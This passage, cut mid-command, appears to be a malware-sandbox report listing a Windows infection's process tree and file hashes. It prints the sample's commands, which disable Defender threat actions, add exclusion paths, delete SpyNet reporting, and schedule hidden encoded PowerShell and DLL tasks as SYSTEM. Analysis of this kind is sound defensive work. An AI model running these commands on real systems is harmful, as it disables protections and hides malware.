\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4920
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4528
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HqWclUkqRTUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HqWclUkqRTUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MySKhCIAjPpVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MySKhCIAjPpVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSrMLwgNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSrMLwgNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uzjGIbOFKwqU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uzjGIbOFKwqU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TePbsdUgyxbrNIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TePbsdUgyxbrNIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gQwnIvOSfgVlPwgt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gQwnIvOSfgVlPwgt\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HqWclUkqRTUn" /t REG_DWORD /d 0 /reg:323⤵PID:4960
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HqWclUkqRTUn" /t REG_DWORD /d 0 /reg:324⤵PID:3800
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HqWclUkqRTUn" /t REG_DWORD /d 0 /reg:643⤵PID:2188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MySKhCIAjPpVC" /t REG_DWORD /d 0 /reg:323⤵PID:1108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MySKhCIAjPpVC" /t REG_DWORD /d 0 /reg:643⤵PID:3168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSrMLwgNU" /t REG_DWORD /d 0 /reg:323⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSrMLwgNU" /t REG_DWORD /d 0 /reg:643⤵PID:3472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uzjGIbOFKwqU2" /t REG_DWORD /d 0 /reg:323⤵PID:1224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uzjGIbOFKwqU2" /t REG_DWORD /d 0 /reg:643⤵PID:2608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR" /t REG_DWORD /d 0 /reg:323⤵PID:1644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR" /t REG_DWORD /d 0 /reg:643⤵PID:3188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TePbsdUgyxbrNIVB /t REG_DWORD /d 0 /reg:323⤵PID:1272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TePbsdUgyxbrNIVB /t REG_DWORD /d 0 /reg:643⤵PID:224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC /t REG_DWORD /d 0 /reg:323⤵PID:4036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC /t REG_DWORD /d 0 /reg:643⤵PID:3564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gQwnIvOSfgVlPwgt /t REG_DWORD /d 0 /reg:323⤵PID:3568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gQwnIvOSfgVlPwgt /t REG_DWORD /d 0 /reg:643⤵PID:3660
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gaGsPMHZR" /SC once /ST 11:24:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:5052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gaGsPMHZR"2⤵PID:2984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gaGsPMHZR"2⤵PID:3428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pBhpQhEndrCBLmKcV" /SC once /ST 12:24:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gQwnIvOSfgVlPwgt\aaCbHJRwrvIgUrd\whfErpC.exe\" Lt /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "pBhpQhEndrCBLmKcV"2⤵PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1704
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4376
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1352
-
C:\Windows\Temp\gQwnIvOSfgVlPwgt\aaCbHJRwrvIgUrd\whfErpC.exeC:\Windows\Temp\gQwnIvOSfgVlPwgt\aaCbHJRwrvIgUrd\whfErpC.exe Lt /site_id 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2680 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bXdYnizyUUWLarOGTm"2⤵PID:4152
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2556
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2696
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4328
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PSrMLwgNU\bZFMBx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "KlOugEwrPWYFNkY" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KlOugEwrPWYFNkY2" /F /xml "C:\Program Files (x86)\PSrMLwgNU\hGHxdwB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "KlOugEwrPWYFNkY"2⤵PID:260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KlOugEwrPWYFNkY"2⤵PID:2644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vbwpVlLfpiGyIe" /F /xml "C:\Program Files (x86)\uzjGIbOFKwqU2\dXeoxoh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vLyprKZFGxqmA2" /F /xml "C:\ProgramData\TePbsdUgyxbrNIVB\TOBrVkB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cFPNTyBOVAcRTsSof2" /F /xml "C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR\HBfgzWt.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lAuFQWjsQzWwDKXOUDY2" /F /xml "C:\Program Files (x86)\MySKhCIAjPpVC\xiMNyWU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oIOmecagrUeRFYAlI" /SC once /ST 02:46:48 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gQwnIvOSfgVlPwgt\RxioLFxc\eolXLqJ.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "oIOmecagrUeRFYAlI"2⤵PID:2172
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:616
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4180
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:5052
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pBhpQhEndrCBLmKcV"2⤵PID:1208
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gQwnIvOSfgVlPwgt\RxioLFxc\eolXLqJ.dll",#1 /site_id 5254031⤵PID:216
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gQwnIvOSfgVlPwgt\RxioLFxc\eolXLqJ.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:320 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oIOmecagrUeRFYAlI"3⤵PID:1112
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57eb9d41309c102d1962927842b2d5192
SHA1ba36b92426a4f11408b7a3b3e5ffc8c6d64e51b0
SHA256e396128aa4974dc888732020b163788a7d52387d1f49b67c69ebae92db9dcced
SHA5128790b37592043d20c31ea7422ba5cd347a95abce8bf418d39a21a00de1387750741172c61cd61d3dc8b35d4c8e9404e6c73408291f303b0aa15978fe5b5695a1
-
Filesize
2KB
MD5c667e8d1ca89a19cf2c1650d5765c94e
SHA171d0636360971d1867d09ab541ceb5f8adf4e56b
SHA256ab94cf20d4c132c11f54a8aa0796d3609745a54a144a66a44f29370edfa66b44
SHA512646fb6b0ae9847cd816128e8aa5d41eb5b3d0a0465021ec352c3d5ec42236bb1a5f67ff898ab7e48af0fcf397f8245f2c271768f516d447099cdcfd61c596865
-
Filesize
2KB
MD53277f9493b57992d3c97138c90deafdb
SHA10821148f3ac876d21f6e698083fb1fe3741b43b8
SHA256cb389ec00c3c347a19805a0b438b9f314223b7154e8cd1b6574c0e97f5e3bf0a
